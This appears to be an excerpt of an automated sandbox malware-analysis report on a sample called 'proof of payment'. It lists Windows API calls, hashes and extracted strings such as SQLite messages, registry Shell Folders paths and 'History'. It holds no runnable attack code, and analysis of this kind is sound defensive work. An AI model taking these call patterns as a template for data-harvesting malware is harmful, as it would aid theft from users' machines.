                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                      • wcscpy.MSVCRT ref: 0040A0D9
                                      • wcscat.MSVCRT ref: 0040A0E6
                                      • wcscat.MSVCRT ref: 0040A0F5
                                      • wcscpy.MSVCRT ref: 0040A107
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                      • String ID:
                                      • API String ID: 1331804452-0
                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: advapi32.dll
                                      • API String ID: 2012295524-4050573280
                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • <%s>, xrefs: 004100A6
                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                      • API String ID: 3473751417-2880344631
                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscat$_snwprintfmemset
                                      • String ID: %2.2X
                                      • API String ID: 2521778956-791839006
                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscpy
                                      • String ID: dialog_%d$general$menu_%d$strings
                                      • API String ID: 999028693-502967061
                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memsetstrlen
                                      • String ID:
                                      • API String ID: 2350177629-0
                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                      • API String ID: 2221118986-1606337402
                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                      APIs
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                        • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                      • memset.MSVCRT ref: 0040C439
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                      • _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      • memset.MSVCRT ref: 0040C4D0
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                      • String ID:
                                      • API String ID: 1973883786-0
                                      • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                      APIs
                                      • memset.MSVCRT ref: 004116FF
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                      • API String ID: 2618321458-3614832568
                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                      APIs
                                      • memset.MSVCRT ref: 004185FC
                                      • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@AttributesFilememset
                                      • String ID:
                                      • API String ID: 776155459-0
                                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                      • malloc.MSVCRT ref: 00417524
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                      • String ID:
                                      • API String ID: 2308052813-0
                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                      APIs
                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PathTemp$??3@
                                      • String ID: %s\etilqs_$etilqs_
                                      • API String ID: 1589464350-1420421710
                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                      APIs
                                      • memset.MSVCRT ref: 0040FDD5
                                        • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                      • String ID: <%s>%s</%s>$</item>$<item>
                                      • API String ID: 1775345501-2769808009
                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                      APIs
                                      • wcscpy.MSVCRT ref: 0041477F
                                      • wcscpy.MSVCRT ref: 0041479A
                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$CloseCreateFileHandle
                                      • String ID: General
                                      • API String ID: 999786162-26480598
                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLastMessage_snwprintf
                                      • String ID: Error$Error %d: %s
                                      • API String ID: 313946961-1552265934
                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: foreign key constraint failed$new$oid$old
                                      • API String ID: 0-1953309616
                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                      Strings
                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                      • API String ID: 3510742995-272990098
                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: gj
                                      • API String ID: 1297977491-4203073231
                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                      • malloc.MSVCRT ref: 004174BD
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                      • String ID:
                                      • API String ID: 2903831945-0
                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                      APIs
                                      • GetParent.USER32(?), ref: 0040D453
                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Window$Rect$ClientParentPoints
                                      • String ID:
                                      • API String ID: 4247780290-0
                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                      • memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                      • String ID:
                                      • API String ID: 1471605966-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • wcscpy.MSVCRT ref: 0044475F
                                      • wcscat.MSVCRT ref: 0044476E
                                      • wcscat.MSVCRT ref: 0044477F
                                      • wcscat.MSVCRT ref: 0044478E
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                      • String ID: \StringFileInfo\
                                      • API String ID: 102104167-2245444037
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$??3@
                                      • String ID: g4@
                                      • API String ID: 3314356048-2133833424
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _memicmpwcslen
                                      • String ID: @@@@$History
                                      • API String ID: 1872909662-685208920
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 004100FB
                                      • memset.MSVCRT ref: 00410112
                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 00410141
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                      • String ID: </%s>
                                      • API String ID: 3400436232-259020660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040D58D
                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
